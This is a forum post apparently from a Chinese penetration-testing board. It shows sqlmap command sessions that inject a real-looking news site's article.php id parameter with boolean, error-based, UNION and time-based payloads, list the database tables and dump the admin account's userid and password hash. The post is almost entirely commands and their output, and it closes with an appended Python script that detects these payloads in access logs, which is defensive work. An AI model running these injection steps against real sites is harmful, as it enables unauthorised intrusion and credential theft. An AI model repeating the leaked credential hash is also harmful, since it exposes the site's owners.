中国网络渗透测试联盟

Title: sqlmap example: injecting a MySQL backend

Author: admin    Time: 2013-4-4 22:18
Title: sqlmap example: injecting a MySQL backend
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user       /* Note: get the current user name

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user:    'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db                  /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database:    'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables  -D "wepost"         /* get the table names of the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /* get the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

[*] shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /* get the contents of the columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

[*] shutting down at: 16:58:14

D:\Python27\sqlmap>
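The four payload families sqlmap reports in every run above (boolean-based, error-based, UNION and time-based) leave recognisable traces in the web server's access log; as an added example that is not part of the original post, the Python below runs defender-side detection over constructed Apache log lines built from those payloads and expands the CHAR() calls so sqlmap's ':cvx:' / ':ncv:' delimiters become readable. The signatures, the sample lines and the client address 203.0.113.5 are my own assumptions, not anything from the post.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the four payload families sqlmap reported against article.php?id.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\bAND\s+(\d+)=\1\b", re.I),
    "error-based": re.compile(r"information_schema\.tables\s+GROUP\s+BY", re.I),
    "UNION query": re.compile(r"\bUNION\s+ALL\s+SELECT\s+NULL\b", re.I),
    "time-based blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
}
CHAR_CALL = re.compile(r"\bCHAR\(([\d,\s]+)\)", re.I)
LOG_REQUEST = re.compile(r'"GET\s+(\S+)\s+HTTP/[\d.]+"')

def decode_char_calls(sql: str) -> str:
    """Expand MySQL CHAR(n,n,...) into the literal it builds, so the ':cvx:' and
    ':ncv:' markers sqlmap wraps around extracted data become readable."""
    def expand(m):
        return "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip())
    return CHAR_CALL.sub(expand, sql)

def classify(query_string: str) -> list:
    """Return the payload families matched by one URL-encoded query string."""
    decoded = decode_char_calls(unquote_plus(query_string))
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan_access_log(lines):
    """Yield (client_ip, request_path, families) for each suspicious GET request."""
    for line in lines:
        m = LOG_REQUEST.search(line)
        if not m or "?" not in m.group(1):
            continue
        path = m.group(1)
        families = classify(path.split("?", 1)[1])
        if families:
            yield line.split()[0], path, families

# Constructed sample log lines (Apache combined format) mirroring the payloads above;
# the client address is a documentation-range placeholder, not a real source.
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Apr/2013:16:53:54 +0800] "GET /article.php?id=276 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [04/Apr/2013:16:53:54 +0800] "GET /article.php?id=276%20AND%20799=799 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [04/Apr/2013:16:53:55 +0800] "GET /article.php?id=276%20AND%20(SELECT%208404%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT%20(CASE%20WHEN%20(8404=8404)%20THEN%201%20ELSE%200%20END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) HTTP/1.1" 500 412',
    '203.0.113.5 - - [04/Apr/2013:16:53:55 +0800] "GET /article.php?id=-8474%20UNION%20ALL%20SELECT%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65)%20AS%20CHAR),CHAR(32)),CHAR(58,110,99,118,58)),%20NULL,%20NULL,%20NULL%23 HTTP/1.1" 200 5200',
    '203.0.113.5 - - [04/Apr/2013:16:53:56 +0800] "GET /article.php?id=276%20AND%20SLEEP(5) HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for ip, path, families in scan_access_log(SAMPLE_LOG):
        print(ip, families, path[:70])
```

The plain `id=276` request produces no hit, so a single client issuing all four families in one second is a strong sqlmap fingerprint worth alerting on; casting `id` to an integer server-side would have closed the injection point itself.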




Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2